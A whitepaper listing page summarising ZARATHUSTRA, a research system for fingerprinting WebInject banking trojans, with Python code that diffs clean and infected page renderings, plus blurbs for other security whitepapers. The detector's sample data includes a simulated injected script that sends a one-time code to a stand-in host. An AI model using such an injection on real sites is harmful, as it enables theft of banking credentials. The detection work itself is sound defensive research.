ZARATHUSTRA: Extracting WebInject Signatures from Banking Trojans

Modern trojans are equipped with a functionality, called WebInject, that can be used to silently modify a web page on the infected end host. Given its flexibility, WebInject-based malware is becoming a popular information-stealing mechanism. In addition, the structured and well-organized malware-as-a-service model makes revenue out of customization kits, which in turn leads to high volumes of binary variants. Analysis approaches based on memory carving, which extract the decrypted webinject.txt and config.bin files at runtime, make the strong assumption that the malware will never change the way such files are handled internally, and are therefore not future proof by design. In addition, developers of sensitive web applications (e.g., online banking) have no tools they could use even to mitigate the effect of WebInjects. WebInject-based trojans insert client-side code (e.g., HTML, JavaScript) while the targeted web pages (e.g., online banking website, search engine) are rendered in the browser. This additional code captures sensitive information entered by the victim (e.g., one-time passwords) or performs other nefarious actions (e.g., click fraud or search engine result poisoning). The visible effect of a WebInject is that a web page rendered on infected clients differs from the very same page rendered on clean machines. We leverage this key observation and propose an approach to automatically characterize the WebInject behavior. Ultimately, our system can be applied to analyze a sample automatically against a set of target websites, without requiring any manual action, or to generate fingerprints that are useful to determine whether a client is infected. Unlike the state of the art, our method works regardless of how the WebInject module is implemented and requires no reverse engineering. We implemented and evaluated our approach against live online websites and a dataset of distinct variants of WebInject-based financial trojans. The results show that our approach correctly recognizes known variants of WebInject-based malware with negligible false positives.
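The key observation in the abstract, that a page rendered on an infected client differs from the same page rendered on a clean one, can be turned into a DOM diff. The Python below is an added example written for this page; it is not ZARATHUSTRA's code and does not reproduce the paper's method. It assumes the analyst has captured the rendered HTML of a target page from at least two clean clients and from the sample under analysis, and it adds one heuristic of its own: fragments that also vary between two clean renderings (here a rotating CSRF token) are treated as legitimate churn and discarded rather than reported as injected. The login markup, the `otp` field and the `drop.example` exfiltration host are constructed sample data.

```python
"""DOM-diff extraction of WebInject fingerprints (added example, not the paper's code)."""
from html.parser import HTMLParser

VOID_TAGS = {"area", "base", "br", "col", "embed", "hr", "img", "input",
             "link", "meta", "param", "source", "track", "wbr"}


class Node:
    def __init__(self, tag, attrs=None, text=""):
        self.tag = tag                       # element name, or "#text" for text nodes
        self.attrs = {k: (v if v is not None else "") for k, v in (attrs or [])}
        self.text = text
        self.children = []


class DomBuilder(HTMLParser):
    """Builds a minimal DOM tree from rendered markup; enough for structural diffing."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.root = Node("#document")
        self.stack = [self.root]

    def handle_starttag(self, tag, attrs):
        node = Node(tag, attrs)
        self.stack[-1].children.append(node)
        if tag not in VOID_TAGS:             # void elements never get children
            self.stack.append(node)

    def handle_endtag(self, tag):
        for i in range(len(self.stack) - 1, 0, -1):   # pop back to the matching open tag
            if self.stack[i].tag == tag:
                del self.stack[i:]
                return

    def handle_data(self, data):             # also receives <script> bodies as raw text
        text = " ".join(data.split())
        if text:
            self.stack[-1].children.append(Node("#text", text=text))


def parse(html):
    builder = DomBuilder()
    builder.feed(html)
    builder.close()
    return builder.root


def serialize(node):
    """Canonical string of a subtree: sorted attributes, collapsed whitespace."""
    if node.tag == "#text":
        return node.text
    attrs = "".join(f' {k}="{v}"' for k, v in sorted(node.attrs.items()))
    return f"<{node.tag}{attrs}>{''.join(serialize(c) for c in node.children)}</{node.tag}>"


def shape(node):
    """Structural key ignoring attribute values and text, except a stable id/name."""
    if node.tag == "#text":
        return "#text"
    ident = node.attrs.get("id") or node.attrs.get("name") or ""
    return f"<{node.tag}[{','.join(sorted(node.attrs))}]{ident}>" \
           f"{''.join(shape(c) for c in node.children)}</{node.tag}>"


def diff_subtrees(reference, observed):
    """Subtrees of `observed` with no identical sibling in `reference`.

    An element whose tag and attributes match but whose content differs is
    recursed into, so only the smallest differing fragments are reported.
    """
    injected, unmatched = [], list(reference.children)
    for child in observed.children:
        canon = serialize(child)
        exact = next((c for c in unmatched if serialize(c) == canon), None)
        if exact is not None:
            unmatched.remove(exact)
            continue
        similar = next((c for c in unmatched if c.tag == child.tag
                        and c.tag != "#text" and c.attrs == child.attrs), None)
        if similar is not None:
            unmatched.remove(similar)
            injected.extend(diff_subtrees(similar, child))
        else:
            injected.append(child)
    return injected


def extract_signatures(clean_renders, infected_render):
    """Fragments present in the infected rendering but not explained by clean churn."""
    base = parse(clean_renders[0])
    churn = {shape(n) for html in clean_renders[1:] for n in diff_subtrees(base, parse(html))}
    return [serialize(n) for n in diff_subtrees(base, parse(infected_render))
            if shape(n) not in churn]


def contains_fragment(html, fragment):
    """Infection check: True if any subtree of `html` serializes exactly to `fragment`."""
    def walk(node):
        return serialize(node) == fragment or any(walk(c) for c in node.children)
    return walk(parse(html))


# Constructed sample renderings of a hypothetical bank login page.
CLEAN_A = """<html><body>
<form id="login" action="/auth" method="post">
  <input type="hidden" name="csrf" value="a1b2c3">
  <label>User</label><input type="text" name="user">
  <label>Password</label><input type="password" name="pass">
  <button type="submit">Sign in</button>
</form></body></html>"""
CLEAN_B = CLEAN_A.replace("a1b2c3", "d4e5f6")          # second clean render: token rotates
INFECTED = CLEAN_A.replace("a1b2c3", "9f8e7d").replace(  # injected OTP field plus exfil hook
    '<button type="submit">',
    '<label>One-time code</label><input type="text" name="otp">\n  <button type="submit">'
).replace("</form>", '</form><script>document.forms.login.onsubmit=function(){'
          'new Image().src="http://drop.example/c?o="+this.otp.value};</script>')

if __name__ == "__main__":
    for sig in extract_signatures([CLEAN_A, CLEAN_B], INFECTED):
        print(sig)
```

Filtering by structural shape is deliberately coarse: an injected element whose tag and attribute names coincide with legitimately churning content (an injected hidden input beside a rotating token, or free text injected where the page shows a changing "last login" line) is dropped silently. A practitioner would render the clean page several times and across sessions before trusting the churn set, and would match fingerprints structurally rather than by exact string when the injected script carries per-victim identifiers.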

Spotlight

OpenText

OpenText is a world leader in Information Management, helping companies securely capture, govern and exchange information on a global scale. OpenText solves digital business challenges for customers, ranging from small and mid-sized businesses to the largest and most complex organizations in the world. For more information about OpenText (NASDAQ/TSX: OTEX), visit www.opentext.com

OTHER WHITEPAPERS

Dell PowerScale OneFS: Security Considerations

whitePaper | December 28, 2022

In the age of Digital Transformation, organizations must adapt to modern data requirements and implement new features for the transformation life cycle. Throughout this process, protecting data is vital as it is an organization’s most valuable asset. This document describes how to maintain an aggressive security posture for a PowerScale OneFS cluster and meet industry security requirements.


Systemic Cybersecurity Risk and role of the Global Community: Managing the Unmanageable

whitePaper | November 29, 2022

In February 2022, a cyberattack on commercial satellite services in Ukraine caused electricity-generating wind farms to shut down across Central Europe. In July 2021, supermarkets in Sweden were forced to close their doors after a cyberattack on an IT services provider based in Florida, USA.


Understanding Ransomware and Strategies to Defeat it

whitePaper | March 5, 2020

Held Hostage in Hollywood: In February 2016 the Hollywood Presbyterian Medical Center, in Los Angeles, paid a ransom of about US$17,000 to hackers who infiltrated and disabled its computer network with ransomware. The hospital paid the ransom of 40 Bitcoins (currently worth about $16,664) after a “network infiltration” began on February 5, when employees reported being unable to access the hospital’s network and electronic medical records system. “The malware locked access to certain computer systems and prevented us from sharing communications electronically,” said hospital CEO Allen Stefanek.


How to Reduce the Risk of Phishing and Ransomware

whitePaper | March 21, 2021

Cybersecurity challenges abound for organizations across the world. The tsunami of phishing attacks that threaten account compromise, data breaches and malware infection remains a critical threat to neutralize. Ransomware is a second critical threat, with a well-played ransomware attack capable of bringing an organization to a complete halt, and in some cases putting it out of business permanently (e.g., Travelex and Vastaamo).


Cisco Secure Email Buyer's Guide

whitePaper | October 20, 2022

Organizations continue to face a daunting challenge. Email is simultaneously the most important business communication tool and the leading attack vector for security breaches. The ubiquitous, and casual, use of email makes it the perfect avenue to deliver threat-centric content, insert malware into corporate systems, steal data, and extort money.


N-able N-central Security White Paper

whitePaper | June 22, 2023

As an integral component of your IT management system, N-able N-central® complements an organization’s existing security policies and infrastructures. N-able N-central consists of a number of components that were specifically designed to provide flexibility as well as to ensure the integrity of the security of the networks on which N-able N-central operates.

